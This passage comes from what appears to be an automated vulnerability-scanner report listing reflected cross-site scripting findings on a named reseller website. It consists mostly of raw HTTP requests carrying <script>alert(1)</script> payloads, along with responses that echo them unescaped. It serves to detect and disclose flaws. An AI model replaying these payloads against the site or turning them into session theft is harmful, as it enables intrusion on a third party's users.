This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/search.php?keyword=search...&Submit3=Search&opt=2&de49b<script>alert(1)</script>0daf5776181=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/search.php?keyword=search...&Submit3=Search&opt=2&de49b<script>alert(1)</script>0daf5776181=1 was not found on this server.</p>
...[SNIP]...

2.2166. http://www.resellerbase.com/detail/30/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 63c52<a>cc796d03327 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/search.php?keyword=search...&Submit3=Search&opt=263c52<a>cc796d03327 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/search.php?keyword=search...&Submit3=Search&opt=263c52<a>cc796d03327 was not found on this server.</p>
...[SNIP]...

2.2167. http://www.resellerbase.com/detail/31/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a1966<script>alert(1)</script>108172b458 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila1966<script>alert(1)</script>108172b458/31/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila1966<script>alert(1)</script>108172b458/31/ was not found on this server.</p>
...[SNIP]...

2.2168. http://www.resellerbase.com/detail/31/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e417e<script>alert(1)</script>412b6fe4ff5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31e417e<script>alert(1)</script>412b6fe4ff5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31e417e<script>alert(1)</script>412b6fe4ff5/ was not found on this server.</p>
...[SNIP]...

2.2169. http://www.resellerbase.com/detail/31/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7fe7e<script>alert(1)</script>a49ef4f900c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/?7fe7e<script>alert(1)</script>a49ef4f900c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/?7fe7e<script>alert(1)</script>a49ef4f900c=1 was not found on this server.</p>
...[SNIP]...

2.2170. http://www.resellerbase.com/detail/31/camsense-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/camsense-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 233cd<script>alert(1)</script>dfc9ffae8d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail233cd<script>alert(1)</script>dfc9ffae8d4/31/camsense-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail233cd<script>alert(1)</script>dfc9ffae8d4/31/camsense-com.html was not found on this server.</p>
...[SNIP]...

2.2171. http://www.resellerbase.com/detail/31/camsense-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/31/camsense-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1f98e<a>46620d77fab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/311f98e<a>46620d77fab/camsense-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/311f98e<a>46620d77fab/camsense-com.html was not found on this server.</p>
...[SNIP]...

2.2172. http://www.resellerbase.com/detail/31/camsense-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/camsense-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5d824<script>alert(1)</script>ee2b244ca03 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/5d824<script>alert(1)</script>ee2b244ca03 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/5d824<script>alert(1)</script>ee2b244ca03 was not found on this server.</p>
...[SNIP]...

2.2173. http://www.resellerbase.com/detail/31/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 65995<script>alert(1)</script>033e75096e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail65995<script>alert(1)</script>033e75096e9/31/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail65995<script>alert(1)</script>033e75096e9/31/rating.php was not found on this server.</p>
...[SNIP]...

2.2174. http://www.resellerbase.com/detail/31/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 924c5<script>alert(1)</script>6681eada03bda9c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail924c5<script>alert(1)</script>6681eada03bda9c3/31/rating.php?id=31&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail924c5<script>alert(1)</script>6681eada03bda9c3/31/rating.php?id=31&rating=5 was not found on this server.</p>
...[SNIP]...

2.2175. http://www.resellerbase.com/detail/31/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bd8c3<script>alert(1)</script>ab2080065b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31bd8c3<script>alert(1)</script>ab2080065b4/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31bd8c3<script>alert(1)</script>ab2080065b4/rating.php was not found on this server.</p>
...[SNIP]...

2.2176. http://www.resellerbase.com/detail/31/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d9165<script>alert(1)</script>2d7ded7a498646a75 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/31d9165<script>alert(1)</script>2d7ded7a498646a75/rating.php?id=31&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31d9165<script>alert(1)</script>2d7ded7a498646a75/rating.php?id=31&rating=5 was not found on this server.</p>
...[SNIP]...

2.2177. http://www.resellerbase.com/detail/31/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 58f87<script>alert(1)</script>558bbb7919b4368e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/31/rating.php58f87<script>alert(1)</script>558bbb7919b4368e1?id=31&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/rating.php58f87<script>alert(1)</script>558bbb7919b4368e1?id=31&rating=5 was not found on this server.</p>
...[SNIP]...

2.2178. http://www.resellerbase.com/detail/31/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 15ed0<script>alert(1)</script>bcd96f4c828 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/rating.php15ed0<script>alert(1)</script>bcd96f4c828 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/rating.php15ed0<script>alert(1)</script>bcd96f4c828 was not found on this server.</p>
...[SNIP]...

2.2179. http://www.resellerbase.com/detail/31/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload aa0b3<script>alert(1)</script>257443ef979331452 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/31/rating.php/aa0b3<script>alert(1)</script>257443ef979331452?id=31&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/rating.php/aa0b3<script>alert(1)</script>257443ef979331452?id=31&rating=5 was not found on this server.</p>
...[SNIP]...

2.2180. http://www.resellerbase.com/detail/31/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 856dc<script>alert(1)</script>84ac193d44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/rating.php?856dc<script>alert(1)</script>84ac193d44=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/rating.php?856dc<script>alert(1)</script>84ac193d44=1 was not found on this server.</p>
...[SNIP]...

2.2181. http://www.resellerbase.com/detail/31/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 24891<script>alert(1)</script>43290dbb187 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail24891<script>alert(1)</script>43290dbb187/31/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail24891<script>alert(1)</script>43290dbb187/31/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2182. http://www.resellerbase.com/detail/31/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b2e19<script>alert(1)</script>d86377aa520 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31b2e19<script>alert(1)</script>d86377aa520/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31b2e19<script>alert(1)</script>d86377aa520/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2183. http://www.resellerbase.com/detail/31/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 11476<script>alert(1)</script>9ff5671b881 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/search.php11476<script>alert(1)</script>9ff5671b881?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/search.php11476<script>alert(1)</script>9ff5671b881?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2184. http://www.resellerbase.com/detail/31/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/31/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 60912<a>bdcb50a5a28 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/search.php?keyword=search...&Submit3=Search60912<a>bdcb50a5a28&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

